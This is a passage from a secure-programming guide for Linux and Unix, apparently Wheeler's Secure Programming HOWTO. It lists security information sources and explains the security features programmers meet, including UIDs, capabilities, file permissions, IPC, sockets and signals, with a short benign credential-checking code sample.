JavaScript; Ed Felten (one of its principles) co-wrote a book on securing
Java ([http://www.securingjava.com] [McGraw 1999]) which is discussed in
Section 10.6. Sun's security code guidelines provide some guidelines
primarily for Java and C; it is available at [http://java.sun.com/security/
seccodeguide.html] http://java.sun.com/security/seccodeguide.html.

Yoder [1998] contains a collection of patterns to be used when dealing with
application security. It's not really a specific set of guidelines, but a set
of commonly-used patterns for programming that you may find useful. The
Schmoo group maintains a web page linking to information on how to write
secure code at [http://www.shmoo.com/securecode] http://www.shmoo.com/
securecode.

There are many documents describing the issue from the other direction (i.e.,
``how to crack a system''). One example is McClure [1999], and there's
countless amounts of material from that vantage point on the Internet. There
are also more general documents on computer architectures on how attacks must
be developed to exploit them, e.g., [LSD 2001]. The Honeynet Project has been
collecting information (including statistics) on how attackers actually
perform their attacks; see their website at [http://project.honeynet.org]
http://project.honeynet.org for more information.

There's also a large body of information on vulnerabilities already
identified in existing programs. This can be a useful set of examples of
``what not to do,'' though it takes effort to extract more general guidelines
from the large body of specific examples. There are mailing lists that
discuss security issues; one of the most well-known is [http://
SecurityFocus.com/forums/bugtraq/faq.html] Bugtraq, which among other things
develops a list of vulnerabilities. The CERT Coordination Center (CERT/CC) is
a major reporting center for Internet security problems which reports on
vulnerabilities. The CERT/CC occasionally produces advisories that provide a
description of a serious security problem and its impact, along with
instructions on how to obtain a patch or details of a workaround; for more
information see [http://www.cert.org] http://www.cert.org. Note that
originally the CERT was a small computer emergency response team, but
officially ``CERT'' doesn't stand for anything now. The Department of
Energy's Computer Incident Advisory Capability (CIAC) also reports on
vulnerabilities. These different groups may identify the same vulnerabilities
but use different names. To resolve this problem, MITRE supports the Common
Vulnerabilities and Exposures (CVE) list which creates a single unique
identifier (``name'') for all publicly known vulnerabilities and security
exposures identified by others; see [http://www.cve.mitre.org] http://
www.cve.mitre.org. NIST's ICAT is a searchable catalog of computer
vulnerabilities, categorizing each CVE vulnerability so that they can be
searched and compared later; see [http://csrc.nist.gov/icat] http://
csrc.nist.gov/icat.

This book is a summary of what I believe are the most useful and important
guidelines. My goal is a book that a good programmer can just read and then
be fairly well prepared to implement a secure program. No single document can
really meet this goal, but I believe the attempt is worthwhile. My objective
is to strike a balance somewhere between a ``complete list of all possible
guidelines'' (that would be unending and unreadable) and the various
``short'' lists available on-line that are nice and short but omit a large
number of critical issues. When in doubt, I include the guidance; I believe
in that case it's better to make the information available to everyone in
this ``one stop shop'' document. The organization presented here is my own
(every list has its own, different structure), and some of the guidelines
(especially the Linux-unique ones, such as those on capabilities and the
FSUID value) are also my own. Reading all of the referenced documents listed
above as well is highly recommended, though I realize that for many it's
impractical.
-----------------------------------------------------------------------------

2.9. Other Sources of Security Information

There are a vast number of web sites and mailing lists dedicated to security
issues. Here are some other sources of security information:

<A0><A0>*<2A>[http://www.securityfocus.com] Securityfocus.com has a wealth of general
    security-related news and information, and hosts a number of
    security-related mailing lists. See their website for information on how
    to subscribe and view their archives. A few of the most relevant mailing
    lists on SecurityFocus are:

    <20><>+<2B>The ``Bugtraq'' mailing list is, as noted above, a ``full disclosure
        moderated mailing list for the detailed discussion and announcement
        of computer security vulnerabilities: what they are, how to exploit
        them, and how to fix them.''

    <20><>+<2B>The ``secprog'' mailing list is a moderated mailing list for the
        discussion of secure software development methodologies and
        techniques. I specifically monitor this list, and I coordinate with
        its moderator to ensure that resolutions reached in SECPROG (if I
        agree with them) are incorporated into this document.

    <20><>+<2B>The ``vuln-dev'' mailing list discusses potential or undeveloped
        holes.


<A0><A0>*<2A>IBM's ``developerWorks: Security'' has a library of interesting articles.
    You can learn more from [http://www.ibm.com/developer/security] http://
    www.ibm.com/developer/security.

<A0><A0>*<2A>For Linux-specific security information, a good source is [http://
    www.linuxsecurity.com] LinuxSecurity.com. If you're interested in
    auditing Linux code, places to see include the Linux Security-Audit
    Project FAQ and [http://www.lkap.org] Linux Kernel Auditing Project are
    dedicated to auditing Linux code for security issues.


Of course, if you're securing specific systems, you should sign up to their
security mailing lists (e.g., Microsoft's, Red Hat's, etc.) so you can be
warned of any security updates.
-----------------------------------------------------------------------------

2.10. Document Conventions

System manual pages are referenced in the format name(number), where number
is the section number of the manual. The pointer value that means ``does not
point anywhere'' is called NULL; C compilers will convert the integer 0 to
the value NULL in most circumstances where a pointer is needed, but note that
nothing in the C standard requires that NULL actually be implemented by a
series of all-zero bits. C and C++ treat the character '\0' (ASCII 0)
specially, and this value is referred to as NIL in this book (this is usually
called ``NUL'', but ``NUL'' and ``NULL'' sound identical). Function and
method names always use the correct case, even if that means that some
sentences must begin with a lower case letter. I use the term ``Unix-like''
to mean Unix, Linux, or other systems whose underlying models are very
similar to Unix; I can't say POSIX, because there are systems such as Windows
2000 that implement portions of POSIX yet have vastly different security
models.

An attacker is called an ``attacker'', ``cracker'', or ``adversary'', and not
a ``hacker''. Some journalists mistakenly use the word ``hacker'' instead of
``attacker''; this book avoids this misuse, because many Linux and Unix
developers refer to themselves as ``hackers'' in the traditional non-evil
sense of the term. To many Linux and Unix developers, the term ``hacker''
continues to mean simply an expert or enthusiast, particularly regarding
computers. It is true that some hackers commit malicious or intrusive
actions, but many other hackers do not, and it's unfair to claim that all
hackers perform malicious activities. Many other glossaries and books note
that not all hackers are attackers. For example, the Industry Advisory
Council's Information Assurance (IA) Special Interest Group (SIG)'s [http://
www.iaconline.org/sig_infoassure.html] Information Assurance Glossary defines
hacker as ``A person who delights in having an intimate understanding of the
internal workings of computers and computer networks. The term is misused in
a negative context where `cracker' should be used.'' The Jargon File has a
[http://www.catb.org/~esr/jargon/html/entry/hacker.html] long and complicate
definition for hacker, starting with ``A person who enjoys exploring the
details of programmable systems and how to stretch their capabilities, as
opposed to most users, who prefer to learn only the minimum necessary.''; it
notes although some people use the term to mean ``A malicious meddler who
tries to discover sensitive information by poking around'', it also states
that this definition is deprecated and that the correct term for this sense
is ``cracker''.

This book uses the ``new'' or ``logical'' quoting system, instead of the
traditional American quoting system: quoted information does not include any
trailing punctuation if the punctuation is not part of the material being
quoted. While this may cause a minor loss of typographical beauty, the
traditional American system causes extraneous characters to be placed inside
the quotes. These extraneous characters have no effect on prose but can be
disastrous in code or computer commands. I use standard American (not
British) spelling; I've yet to meet an English speaker on any continent who
has trouble with this.
-----------------------------------------------------------------------------

Chapter 3. Summary of Linux and Unix Security Features

<A0>                                      Discretion will protect you, and
                                       understanding will guard you.
<A0>                                                         Proverbs 2:11 (NIV)

Before discussing guidelines on how to use Linux or Unix security features,
it's useful to know what those features are from a programmer's viewpoint.
This section briefly describes those features that are widely available on
nearly all Unix-like systems. However, note that there is considerable
variation between different versions of Unix-like systems, and not all
systems have the abilities described here. This chapter also notes some
extensions or features specific to Linux; Linux distributions tend to be
fairly similar to each other from the point-of-view of programming for
security, because they all use essentially the same kernel and C library (and
the GPL-based licenses encourage rapid dissemination of any innovations). It
also notes some of the security-relevant differences between different Unix
implementations, but please note that this isn't an exhaustive list. This
chapter doesn't discuss issues such as implementations of mandatory access
control (MAC) which many Unix-like systems do not implement. If you already
know what those features are, please feel free to skip this section.

Many programming guides skim briefly over the security-relevant portions of
Linux or Unix and skip important information. In particular, they often
discuss ``how to use'' something in general terms but gloss over the security
attributes that affect their use. Conversely, there's a great deal of
detailed information in the manual pages about individual functions, but the
manual pages sometimes obscure key security issues with detailed discussions
on how to use each individual function. This section tries to bridge that
gap; it gives an overview of the security mechanisms in Linux that are likely
to be used by a programmer, but concentrating specifically on the security
ramifications. This section has more depth than the typical programming
guides, focusing specifically on security-related matters, and points to
references where you can get more details.

First, the basics. Linux and Unix are fundamentally divided into two parts:
the kernel and ``user space''. Most programs execute in user space (on top of
the kernel). Linux supports the concept of ``kernel modules'', which is
simply the ability to dynamically load code into the kernel, but note that it
still has this fundamental division. Some other systems (such as the HURD)
are ``microkernel'' based systems; they have a small kernel with more limited
functionality, and a set of ``user'' programs that implement the lower-level
functions traditionally implemented by the kernel.

Some Unix-like systems have been extensively modified to support strong
security, in particular to support U.S. Department of Defense requirements
for Mandatory Access Control (level B1 or higher). This version of this book
doesn't cover these systems or issues; I hope to expand to that in a future
version. More detailed information on some of them is available elsewhere,
for example, details on SGI's ``Trusted IRIX/B'' are available in NSA's Final
Evaluation Reports (FERs).

When users log in, their usernames are mapped to integers marking their
``UID'' (for ``user id'') and the ``GID''s (for ``group id'') that they are a
member of. UID 0 is a special privileged user (role) traditionally called
``root''; on most Unix-like systems (including Unix) root can overrule most
security checks and is used to administrate the system. On some Unix systems,
GID 0 is also special and permits unrestricted access to resources at the
group level [Gay 2000, 228]; this isn't true on other systems (such as
Linux), but even in those systems group 0 is essentially all-powerful because
so many special system files are owned by group 0. Processes are the only
``subjects'' in terms of security (that is, only processes are active
objects). Processes can access various data objects, in particular filesystem
objects (FSOs), System V Interprocess Communication (IPC) objects, and
network ports. Processes can also set signals. Other security-relevant topics
include quotas and limits, libraries, auditing, and PAM. The next few
subsections detail this.
-----------------------------------------------------------------------------

3.1. Processes

In Unix-like systems, user-level activities are implemented by running
processes. Most Unix systems support a ``thread'' as a separate concept;
threads share memory inside a process, and the system scheduler actually
schedules threads. Linux does this differently (and in my opinion uses a
better approach): there is no essential difference between a thread and a
process. Instead, in Linux, when a process creates another process it can
choose what resources are shared (e.g., memory can be shared). The Linux
kernel then performs optimizations to get thread-level speeds; see clone(2)
for more information. It's worth noting that the Linux kernel developers tend
to use the word ``task'', not ``thread'' or ``process'', but the external
documentation tends to use the word process (so I'll use the term ``process''
here). When programming a multi-threaded application, it's usually better to
use one of the standard thread libraries that hide these differences. Not
only does this make threading more portable, but some libraries provide an
additional level of indirection, by implementing more than one
application-level thread as a single operating system thread; this can
provide some improved performance on some systems for some applications.
-----------------------------------------------------------------------------

3.1.1. Process Attributes

Here are typical attributes associated with each process in a Unix-like
system:

<A0><A0>*<2A>RUID, RGID - real UID and GID of the user on whose behalf the process is
    running

<A0><A0>*<2A>EUID, EGID - effective UID and GID used for privilege checks (except for
    the filesystem)

<A0><A0>*<2A>SUID, SGID - Saved UID and GID; used to support switching permissions
    ``on and off'' as discussed below. Not all Unix-like systems support
    this, but the vast majority do (including Linux and Solaris); if you want
    to check if a given system implements this option in the POSIX standard,
    you can use sysconf(2) to determine if _POSIX_SAVED_IDS is in effect.

<A0><A0>*<2A>supplemental groups - a list of groups (GIDs) in which this user has
    membership. In the original version 7 Unix, this didn't exist - processes
    were only a member of one group at a time, and a special command had to
    be executed to change that group. BSD added support for a list of groups
    in each process, which is more flexible, and this addition is now widely
    implemented (including by Linux and Solaris).

<A0><A0>*<2A>umask - a set of bits determining the default access control settings
    when a new filesystem object is created; see umask(2).

<A0><A0>*<2A>scheduling parameters - each process has a scheduling policy, and those
    with the default policy SCHED_OTHER have the additional parameters nice,
    priority, and counter. See sched_setscheduler(2) for more information.

<A0><A0>*<2A>limits - per-process resource limits (see below).

<A0><A0>*<2A>filesystem root - the process' idea of where the root filesystem ("/")
    begins; see chroot(2).


Here are less-common attributes associated with processes:

<A0><A0>*<2A>FSUID, FSGID - UID and GID used for filesystem access checks; this is
    usually equal to the EUID and EGID respectively. This is a Linux-unique
    attribute.

<A0><A0>*<2A>capabilities - POSIX capability information; there are actually three
    sets of capabilities on a process: the effective, inheritable, and
    permitted capabilities. See below for more information on POSIX
    capabilities. Linux kernel version 2.2 and greater support this; some
    other Unix-like systems do too, but it's not as widespread.


In Linux, if you really need to know exactly what attributes are associated
with each process, the most definitive source is the Linux source code, in
particular /usr/include/linux/sched.h's definition of task_struct.

The portable way to create new processes it use the fork(2) call. BSD
introduced a variant called vfork(2) as an optimization technique. The bottom
line with vfork(2) is simple: don't use it if you can avoid it. See Section
8.6 for more information.

Linux supports the Linux-unique clone(2) call. This call works like fork(2),
but allows specification of which resources should be shared (e.g., memory,
file descriptors, etc.). Various BSD systems implement an rfork() system call
(originally developed in Plan9); it has different semantics but the same
general idea (it also creates a process with tighter control over what is
shared). Portable programs shouldn't use these calls directly, if possible;
as noted earlier, they should instead rely on threading libraries that use
such calls to implement threads.

This book is not a full tutorial on writing programs, so I will skip
widely-available information handling processes. You can see the
documentation for wait(2), exit(2), and so on for more information.
-----------------------------------------------------------------------------

3.1.2. POSIX Capabilities

POSIX capabilities are sets of bits that permit splitting of the privileges
typically held by root into a larger set of more specific privileges. POSIX
capabilities are defined by a draft IEEE standard; they're not unique to
Linux but they're not universally supported by other Unix-like systems
either. Linux kernel 2.0 did not support POSIX capabilities, while version
2.2 added support for POSIX capabilities to processes. When Linux
documentation (including this one) says ``requires root privilege'', in
nearly all cases it really means ``requires a capability'' as documented in
the capability documentation. If you need to know the specific capability
required, look it up in the capability documentation.

In Linux, the eventual intent is to permit capabilities to be attached to
files in the filesystem; as of this writing, however, this is not yet
supported. There is support for transferring capabilities, but this is
disabled by default. Linux version 2.2.11 added a feature that makes
capabilities more directly useful, called the ``capability bounding set''.
The capability bounding set is a list of capabilities that are allowed to be
held by any process on the system (otherwise, only the special init process
can hold it). If a capability does not appear in the bounding set, it may not
be exercised by any process, no matter how privileged. This feature can be
used to, for example, disable kernel module loading. A sample tool that takes
advantage of this is LCAP at [http://pweb.netcom.com/~spoon/lcap/] http://
pweb.netcom.com/~spoon/lcap/.

More information about POSIX capabilities is available at [ftp://
linux.kernel.org/pub/linux/libs/security/linux-privs] ftp://linux.kernel.org/
pub/linux/libs/security/linux-privs.
-----------------------------------------------------------------------------

3.1.3. Process Creation and Manipulation

Processes may be created using fork(2), the non-recommended vfork(2), or the
Linux-unique clone(2); all of these system calls duplicate the existing
process, creating two processes out of it. A process can execute a different
program by calling execve(2), or various front-ends to it (for example, see
exec(3), system(3), and popen(3)).

When a program is executed, and its file has its setuid or setgid bit set,
the process' EUID or EGID (respectively) is usually set to the file's value.
This functionality was the source of an old Unix security weakness when used
to support setuid or setgid scripts, due to a race condition. Between the
time the kernel opens the file to see which interpreter to run, and when the
(now-set-id) interpreter turns around and reopens the file to interpret it,
an attacker might change the file (directly or via symbolic links).

Different Unix-like systems handle the security issue for setuid scripts in
different ways. Some systems, such as Linux, completely ignore the setuid and
setgid bits when executing scripts, which is clearly a safe approach. Most
modern releases of SysVr4 and BSD 4.4 use a different approach to avoid the
kernel race condition. On these systems, when the kernel passes the name of
the set-id script to open to the interpreter, rather than using a pathname
(which would permit the race condition) it instead passes the filename /dev/
fd/3. This is a special file already opened on the script, so that there can
be no race condition for attackers to exploit. Even on these systems I
recommend against using the setuid/setgid shell scripts language for secure
programs, as discussed below.

In some cases a process can affect the various UID and GID values; see setuid
(2), seteuid(2), setreuid(2), and the Linux-unique setfsuid(2). In particular
the saved user id (SUID) attribute is there to permit trusted programs to
temporarily switch UIDs. Unix-like systems supporting the SUID use the
following rules: If the RUID is changed, or the EUID is set to a value not
equal to the RUID, the SUID is set to the new EUID. Unprivileged users can
set their EUID from their SUID, the RUID to the EUID, and the EUID to the
RUID.

The Linux-unique FSUID process attribute is intended to permit programs like
the NFS server to limit themselves to only the filesystem rights of some
given UID without giving that UID permission to send signals to the process.
Whenever the EUID is changed, the FSUID is changed to the new EUID value; the
FSUID value can be set separately using setfsuid(2), a Linux-unique call.
Note that non-root callers can only set FSUID to the current RUID, EUID,
SEUID, or current FSUID values.
-----------------------------------------------------------------------------

3.2. Files

On all Unix-like systems, the primary repository of information is the file
tree, rooted at ``/''. The file tree is a hierarchical set of directories,
each of which may contain filesystem objects (FSOs).

In Linux, filesystem objects (FSOs) may be ordinary files, directories,
symbolic links, named pipes (also called first-in first-outs or FIFOs),
sockets (see below), character special (device) files, or block special
(device) files (in Linux, this list is given in the find(1) command). Other
Unix-like systems have an identical or similar list of FSO types.

Filesystem objects are collected on filesystems, which can be mounted and
unmounted on directories in the file tree. A filesystem type (e.g., ext2 and
FAT) is a specific set of conventions for arranging data on the disk to
optimize speed, reliability, and so on; many people use the term
``filesystem'' as a synonym for the filesystem type.
-----------------------------------------------------------------------------

3.2.1. Filesystem Object Attributes

Different Unix-like systems support different filesystem types. Filesystems
may have slightly different sets of access control attributes and access
controls can be affected by options selected at mount time. On Linux, the
ext2 filesystems is currently the most popular filesystem, but Linux supports
a vast number of filesystems. Most Unix-like systems tend to support multiple
filesystems too.

Most filesystems on Unix-like systems store at least the following:

<A0><A0>*<2A>owning UID and GID - identifies the ``owner'' of the filesystem object.
    Only the owner or root can change the access control attributes unless
    otherwise noted.

<A0><A0>*<2A>permission bits - read, write, execute bits for each of user (owner),
    group, and other. For ordinary files, read, write, and execute have their
    typical meanings. In directories, the ``read'' permission is necessary to
    display a directory's contents, while the ``execute'' permission is
    sometimes called ``search'' permission and is necessary to actually enter
    the directory to use its contents. In a directory ``write'' permission on
    a directory permits adding, removing, and renaming files in that
    directory; if you only want to permit adding, set the sticky bit noted
    below. Note that the permission values of symbolic links are never used;
    it's only the values of their containing directories and the linked-to
    file that matter.

<A0><A0>*<2A>``sticky'' bit - when set on a directory, unlinks (removes) and renames
    of files in that directory are limited to the file owner, the directory
    owner, or root privileges. This is a very common Unix extension and is
    specified in the Open Group's Single Unix Specification version 2. Old
    versions of Unix called this the ``save program text'' bit and used this
    to indicate executable files that should stay in memory. Systems that did
    this ensured that only root could set this bit (otherwise users could
    have crashed systems by forcing ``everything'' into memory). In Linux,
    this bit has no effect on ordinary files and ordinary users can modify
    this bit on the files they own: Linux's virtual memory management makes
    this old use irrelevant.

<A0><A0>*<2A>setuid, setgid - when set on an executable file, executing the file will
    set the process' effective UID or effective GID to the value of the
    file's owning UID or GID (respectively). All Unix-like systems support
    this. In Linux and System V systems, when setgid is set on a file that
    does not have any execute privileges, this indicates a file that is
    subject to mandatory locking during access (if the filesystem is mounted
    to support mandatory locking); this overload of meaning surprises many
    and is not universal across Unix-like systems. In fact, the Open Group's
    Single Unix Specification version 2 for chmod(3) permits systems to
    ignore requests to turn on setgid for files that aren't executable if
    such a setting has no meaning. In Linux and Solaris, when setgid is set
    on a directory, files created in the directory will have their GID
    automatically reset to that of the directory's GID. The purpose of this
    approach is to support ``project directories'': users can save files into
    such specially-set directories and the group owner automatically changes.
    However, setting the setgid bit on directories is not specified by
    standards such as the Single Unix Specification [Open Group 1997].

<A0><A0>*<2A>timestamps - access and modification times are stored for each filesystem
    object. However, the owner is allowed to set these values arbitrarily
    (see touch(1)), so be careful about trusting this information. All
    Unix-like systems support this.


The following attributes are Linux-unique extensions on the ext2 filesystem,
though many other filesystems have similar functionality:

<A0><A0>*<2A>immutable bit - no changes to the filesystem object are allowed; only
    root can set or clear this bit. This is only supported by ext2 and is not
    portable across all Unix systems (or even all Linux filesystems).

<A0><A0>*<2A>append-only bit - only appending to the filesystem object are allowed;
    only root can set or clear this bit. This is only supported by ext2 and
    is not portable across all Unix systems (or even all Linux filesystems).


Other common extensions include some sort of bit indicating ``cannot delete
this file''.

Many of these values can be influenced at mount time, so that, for example,
certain bits can be treated as though they had a certain value (regardless of
their values on the media). See mount(1) for more information about this.
These bits are useful, but be aware that some of these are intended to
simplify ease-of-use and aren't really sufficient to prevent certain actions.
For example, on Linux, mounting with ``noexec'' will disable execution of
programs on that file system; as noted in the manual, it's intended for
mounting filesystems containing binaries for incompatible systems. On Linux,
this option won't completely prevent someone from running the files; they can
copy the files somewhere else to run them, or even use the command ``/lib/
ld-linux.so.2'' to run the file directly.

Some filesystems don't support some of these access control values; again,
see mount(1) for how these filesystems are handled. In particular, many
Unix-like systems support MS-DOS disks, which by default support very few of
these attributes (and there's not standard way to define these attributes).
In that case, Unix-like systems emulate the standard attributes (possibly
implementing them through special on-disk files), and these attributes are
generally influenced by the mount(1) command.

It's important to note that, for adding and removing files, only the
permission bits and owner of the file's directory really matter unless the
Unix-like system supports more complex schemes (such as POSIX ACLs). Unless
the system has other extensions, and stock Linux 2.2 doesn't, a file that has
no permissions in its permission bits can still be removed if its containing
directory permits it. Also, if an ancestor directory permits its children to
be changed by some user or group, then any of that directory's descendants
can be replaced by that user or group.

The draft IEEE POSIX standard on security defines a technique for true ACLs
that support a list of users and groups with their permissions.
Unfortunately, this is not widely supported nor supported exactly the same
way across Unix-like systems. Stock Linux 2.2, for example, has neither ACLs
nor POSIX capability values in the filesystem.

It's worth noting that in Linux, the Linux ext2 filesystem by default
reserves a small amount of space for the root user. This is a partial defense
against denial-of-service attacks; even if a user fills a disk that is shared
with the root user, the root user has a little space left over (e.g., for
critical functions). The default is 5% of the filesystem space; see mke2fs
(8), in particular its ``-m'' option.
-----------------------------------------------------------------------------

3.2.2. Creation Time Initial Values

At creation time, the following rules apply. On most Unix systems, when a new
filesystem object is created via creat(2) or open(2), the FSO UID is set to
the process' EUID and the FSO's GID is set to the process' EGID. Linux works
slightly differently due to its FSUID extensions; the FSO's UID is set to the
process' FSUID, and the FSO GID is set to the process' FSGUID; if the
containing directory's setgid bit is set or the filesystem's ``GRPID'' flag
is set, the FSO GID is actually set to the GID of the containing directory.
Many systems, including Sun Solaris and Linux, also support the setgid
directory extensions. As noted earlier, this special case supports
``project'' directories: to make a ``project'' directory, create a special
group for the project, create a directory for the project owned by that
group, then make the directory setgid: files placed there are automatically
owned by the project. Similarly, if a new subdirectory is created inside a
directory with the setgid bit set (and the filesystem GRPID isn't set), the
new subdirectory will also have its setgid bit set (so that project
subdirectories will ``do the right thing''.); in all other cases the setgid
is clear for a new file. This is the rationale for the ``user-private group''
scheme (used by Red Hat Linux and some others). In this scheme, every user is
a member of a ``private'' group with just themselves as members, so their
defaults can permit the group to read and write any file (since they're the
only member of the group). Thus, when the file's group membership is
transferred this way, read and write privileges are transferred too. FSO
basic access control values (read, write, execute) are computed from
(requested values & ~ umask of process). New files always start with a clear
sticky bit and clear setuid bit.
-----------------------------------------------------------------------------

3.2.3. Changing Access Control Attributes

You can set most of these values with chmod(2), fchmod(2), or chmod(1) but
see also chown(1), and chgrp(1). In Linux, some of the Linux-unique
attributes are manipulated using chattr(1).

Note that in Linux, only root can change the owner of a given file. Some
Unix-like systems allow ordinary users to transfer ownership of their files
to another, but this causes complications and is forbidden by Linux. For
example, if you're trying to limit disk usage, allowing such operations would
allow users to claim that large files actually belonged to some other
``victim''.
-----------------------------------------------------------------------------

3.2.4. Using Access Control Attributes

Under Linux and most Unix-like systems, reading and writing attribute values
are only checked when the file is opened; they are not re-checked on every
read or write. Still, a large number of calls do check these attributes,
since the filesystem is so central to Unix-like systems. Calls that check
these attributes include open(2), creat(2), link(2), unlink(2), rename(2),
mknod(2), symlink(2), and socket(2).
-----------------------------------------------------------------------------

3.2.5. Filesystem Hierarchy

Over the years conventions have been built on ``what files to place where''.
Where possible, please follow conventional use when placing information in
the hierarchy. For example, place global configuration information in /etc.
The Filesystem Hierarchy Standard (FHS) tries to define these conventions in
a logical manner, and is widely used by Linux systems. The FHS is an update
to the previous Linux Filesystem Structure standard (FSSTND), incorporating
lessons learned and approaches from Linux, BSD, and System V systems. See
[http://www.pathname.com/fhs] http://www.pathname.com/fhs for more
information about the FHS. A summary of these conventions is in hier(5) for
Linux and hier(7) for Solaris. Sometimes different conventions disagree;
where possible, make these situations configurable at compile or installation
time.

I should note that the FHS has been adopted by the [http://www.linuxbase.org]
Linux Standard Base which is developing and promoting a set of standards to
increase compatibility among Linux distributions and to enable software
applications to run on any compliant Linux system.
-----------------------------------------------------------------------------

3.3. System V IPC

Many Unix-like systems, including Linux and System V systems, support System
V interprocess communication (IPC) objects. Indeed System V IPC is required
by the Open Group's Single UNIX Specification, Version 2 [Open Group 1997].
System V IPC objects can be one of three kinds: System V message queues,
semaphore sets, and shared memory segments. Each such object has the
following attributes:

<A0><A0>*<2A>read and write permissions for each of creator, creator group, and
    others.

<A0><A0>*<2A>creator UID and GID - UID and GID of the creator of the object.

<A0><A0>*<2A>owning UID and GID - UID and GID of the owner of the object (initially
    equal to the creator UID).


When accessing such objects, the rules are as follows:

<A0><A0>*<2A>if the process has root privileges, the access is granted.

<A0><A0>*<2A>if the process' EUID is the owner or creator UID of the object, then the
    appropriate creator permission bit is checked to see if access is
    granted.

<A0><A0>*<2A>if the process' EGID is the owner or creator GID of the object, or one of
    the process' groups is the owning or creating GID of the object, then the
    appropriate creator group permission bit is checked for access.

<A0><A0>*<2A>otherwise, the appropriate ``other'' permission bit is checked for
    access.


Note that root, or a process with the EUID of either the owner or creator,
can set the owning UID and owning GID and/or remove the object. More
information is available in ipc(5).
-----------------------------------------------------------------------------

3.4. Sockets and Network Connections

Sockets are used for communication, particularly over a network. Sockets were
originally developed by the BSD branch of Unix systems, but they are
generally portable to other Unix-like systems: Linux and System V variants
support sockets as well, and socket support is required by the Open Group's
Single Unix Specification [Open Group 1997]. System V systems traditionally
used a different (incompatible) network communication interface, but it's
worth noting that systems like Solaris include support for sockets. Socket(2)
creates an endpoint for communication and returns a descriptor, in a manner
similar to open(2) for files. The parameters for socket specify the protocol
family and type, such as the Internet domain (TCP/IP version 4), Novell's
IPX, or the ``Unix domain''. A server then typically calls bind(2), listen
(2), and accept(2) or select(2). A client typically calls bind(2) (though
that may be omitted) and connect(2). See these routine's respective man pages
for more information. It can be difficult to understand how to use sockets
from their man pages; you might want to consult other papers such as Hall
"Beej" [1999] to learn how these calls are used together.

The ``Unix domain sockets'' don't actually represent a network protocol; they
can only connect to sockets on the same machine. (at the time of this writing
for the standard Linux kernel). When used as a stream, they are fairly
similar to named pipes, but with significant advantages. In particular, Unix
domain socket is connection-oriented; each new connection to the socket
results in a new communication channel, a very different situation than with
named pipes. Because of this property, Unix domain sockets are often used
instead of named pipes to implement IPC for many important services. Just
like you can have unnamed pipes, you can have unnamed Unix domain sockets
using socketpair(2); unnamed Unix domain sockets are useful for IPC in a way
similar to unnamed pipes.

There are several interesting security implications of Unix domain sockets.
First, although Unix domain sockets can appear in the filesystem and can have
stat(2) applied to them, you can't use open(2) to open them (you have to use
the socket(2) and friends interface). Second, Unix domain sockets can be used
to pass file descriptors between processes (not just the file's contents).
This odd capability, not available in any other IPC mechanism, has been used
to hack all sorts of schemes (the descriptors can basically be used as a
limited version of the ``capability'' in the computer science sense of the
term). File descriptors are sent using sendmsg(2), where the msg (message)'s
field msg_control points to an array of control message headers (field
msg_controllen must specify the number of bytes contained in the array). Each
control message is a struct cmsghdr followed by data, and for this purpose
you want the cmsg_type set to SCM_RIGHTS. A file descriptor is retrieved
through recvmsg(2) and then tracked down in the analogous way. Frankly, this
feature is quite baroque, but it's worth knowing about.

Linux 2.2 and later supports an additional feature in Unix domain sockets:
you can acquire the peer's ``credentials'' (the pid, uid, and gid). Here's
some sample code:
 /* fd= file descriptor of Unix domain socket connected
    to the client you wish to identify */

 struct ucred cr;
 int cl=sizeof(cr);

 if (getsockopt(fd, SOL_SOCKET, SO_PEERCRED, &cr, &cl)==0) {
   printf("Peer's pid=%d, uid=%d, gid=%d\n",
           cr.pid, cr.uid, cr.gid);

Standard Unix convention is that binding to TCP and UDP local port numbers
less than 1024 requires root privilege, while any process can bind to an
unbound port number of 1024 or greater. Linux follows this convention, more
specifically, Linux requires a process to have the capability
CAP_NET_BIND_SERVICE to bind to a port number less than 1024; this capability
is normally only held by processes with an EUID of 0. The adventurous can
check this in Linux by examining its Linux's source; in Linux 2.2.12, it's
file /usr/src/linux/net/ipv4/af_inet.c, function inet_bind().
-----------------------------------------------------------------------------

3.5. Signals

Signals are a simple form of ``interruption'' in the Unix-like OS world, and
are an ancient part of Unix. A process can set a ``signal'' on another
process (say using kill(1) or kill(2)), and that other process would receive
and handle the signal asynchronously. For a process to have permission to
send an arbitrary signal to some other process, the sending process must
either have root privileges, or the real or effective user ID of the sending
process must equal the real or saved set-user-ID of the receiving process.
However, some signals can be sent in other ways. In particular, SIGURG can be
delivered over a network through the TCP/IP out-of-band (OOB) message.

Although signals are an ancient part of Unix, they've had different semantics
in different implementations. Basically, they involve questions such as
``what happens when a signal occurs while handling another signal''? The
older Linux libc 5 used a different set of semantics for some signal
operations than the newer GNU libc libraries. Calling C library functions is
often unsafe within a signal handler, and even some system calls aren't safe;
you need to examine the documentation for each call you make to see if it
promises to be safe to call inside a signal. For more information, see the
glibc FAQ (on some systems a local copy is available at /usr/doc/glibc-*/
FAQ).

For new programs, just use the POSIX signal system (which in turn was based
on BSD work); this set is widely supported and doesn't have some of the
problems that some of the older signal systems did. The POSIX signal system
is based on using the sigset_t datatype, which can be manipulated through a
set of operations: sigemptyset(), sigfillset(), sigaddset(), sigdelset(), and
sigismember(). You can read about these in sigsetops(3). Then use sigaction
(2), sigprocmask(2), sigpending(2), and sigsuspend(2) to set up an manipulate
signal handling (see their man pages for more information).

In general, make any signal handlers very short and simple, and look
carefully for race conditions. Signals, since they are by nature
asynchronous, can easily cause race conditions.

A common convention exists for servers: if you receive SIGHUP, you should
close any log files, reopen and reread configuration files, and then re-open
the log files. This supports reconfiguration without halting the server and
log rotation without data loss. If you are writing a server where this
convention makes sense, please support it.

Michal Zalewski [2001] has written an excellent tutorial on how signal
handlers are exploited, and has recommendations for how to eliminate signal
race problems. I encourage looking at his summary for more information; here
are my recommendations, which are similar to Michal's work:

<A0><A0>*<2A>Where possible, have your signal handlers unconditionally set a specific
    flag and do nothing else.

<A0><A0>*<2A>If you must have more complex signal handlers, use only calls
    specifically designated as being safe for use in signal handlers. In
    particular, don't use malloc() or free() in C (which on most systems
    aren't protected against signals), nor the many functions that depend on
    them (such as the printf() family and syslog()). You could try to
    ``wrap'' calls to insecure library calls with a check to a global flag
    (to avoid re-entry), but I wouldn't recommend it.

<A0><A0>*<2A>Block signal delivery during all non-atomic operations in the program,
    and block signal delivery inside signal handlers.


-----------------------------------------------------------------------------
3.6. Quotas and Limits

Many Unix-like systems have mechanisms to support filesystem quotas and
process resource limits. This certainly includes Linux. These mechanisms are
particularly useful for preventing denial of service attacks; by limiting the
resources available to each user, you can make it hard for a single user to
use up all the system resources. Be careful with terminology here, because
